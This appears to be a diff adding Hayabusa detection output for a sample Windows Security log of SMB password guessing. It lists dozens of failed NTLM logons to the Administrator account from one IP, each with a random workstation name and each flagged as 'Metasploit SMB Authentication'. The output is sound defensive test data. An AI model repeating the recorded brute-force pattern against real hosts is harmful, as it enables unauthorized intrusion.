+2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k3ShOCSaLGX4YBWE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lIrydzi8nmY251Z1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h4vlRksTGxAqEt9j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uJMnD0foEDbcNfTj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HNWppBJLFojEFtiF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: t7a9Tvr6ruDpiG2T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NBNIizCKz2ybc3eM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YwuXQhISpgfSFqZ9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.961 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yeONLdrrauxqvgaT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RFqSH4toadsTideV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HuMa0Juj1tjL6NDY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UA8zU0kJ6gAFqSaF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jvX85gF8wk3AGJyb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OpzOMKQIBrkQW5Os  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cqzrLAqHNi4CHT56  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HWMap8qHlykO6Yeu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pkc9LWakJBjhBQv6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y43cE75gTzA1XjHF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9HopaYDAbYxHjJEr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: brNgudTWJaKs8nLd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MzPwOqU92kdGodBH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IXlzxK5OXL9hpqrZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2cLdgWvrVh7h2jPk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h34xlYavVsXQRCYG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6wjflwqXyFzYTi0b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MlsuCSajqGUYTBWL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xQDdrQQZ5xYBDiRi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JX5NMuwUsOZEp3zh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JfrbGLqKGru8AE2a  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 813natbodi6QauRW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.961 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KpfKxOZG3xSr5Yqm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fErWiEb0USDghXsB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fOWF6YnW8UEPlw41  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SNPXuHduatLFQc8W  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 35rfur4MzKzwxCIn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VmAqzaZaeoSjcuh5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lKuCpuGcGmDOoewr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Bz6SOAeTyqsBz6Oa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CSURiEoC7dw0w0ru  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bDjwkaHT8lrFmn9X  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ayI129HgVWA5q4Sk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jT2yiuOJS8Fvf9SD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1hpAO2UrjFd6Kxt0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZkgGj9Fnqn3XwnBT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WFXPYo0yzR7p8dNU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9j6MxN7PuM29Vlcq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
